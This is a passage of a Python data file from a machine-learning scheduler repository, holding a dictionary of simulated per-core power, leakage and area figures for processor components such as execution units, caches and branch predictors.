] | null | null | null | benchmarks/SimResults/combinations_spec_ml/cmp_astarlbmtontoh264ref/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0693166,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.257133,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.486923,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.274652,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.475598,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.272769,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.02302,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.196831,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.05766,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0919902,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00995635,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0933703,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0736333,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.185361,
'Execution Unit/Register Files/Runtime Dynamic': 0.0835897,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.244611,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.612037,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.38116,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00116337,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00116337,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00103021,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000408068,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00105775,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0044147,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0105496,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0707856,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.50257,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.165687,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.24042,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.94295,
'Instruction Fetch Unit/Runtime Dynamic': 0.491856,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0968341,
'L2/Runtime Dynamic': 0.0531791,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.15836,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.04603,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0621566,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0621566,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.45307,
'Load Store Unit/Runtime Dynamic': 1.41473,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.153268,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.306535,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0543952,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0558393,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.279953,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0271923,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.532491,
'Memory Management Unit/Runtime Dynamic': 0.0830316,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 21.6447,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.320934,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0179061,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.136921,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.475761,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.89971,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0211686,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.219315,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.148635,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.27234,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.439274,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.221731,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.933346,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.288691,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.63013,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0280803,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0114232,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.089134,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0844813,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.117214,
'Execution Unit/Register Files/Runtime Dynamic': 0.0959045,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.193074,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.580612,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.23455,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00111369,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00111369,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000991245,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000395333,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00121358,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00443221,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00991979,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0812141,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.16591,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.196522,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.275839,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.63514,
'Instruction Fetch Unit/Runtime Dynamic': 0.567928,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0392843,
'L2/Runtime Dynamic': 0.0211171,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.18256,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.45945,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0952921,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0952921,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.63255,
'Load Store Unit/Runtime Dynamic': 2.02469,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.234974,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.469948,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.083393,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0839726,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.321197,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0322477,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.620561,
'Memory Management Unit/Runtime Dynamic': 0.11622,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 21.1471,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.073866,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0131862,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
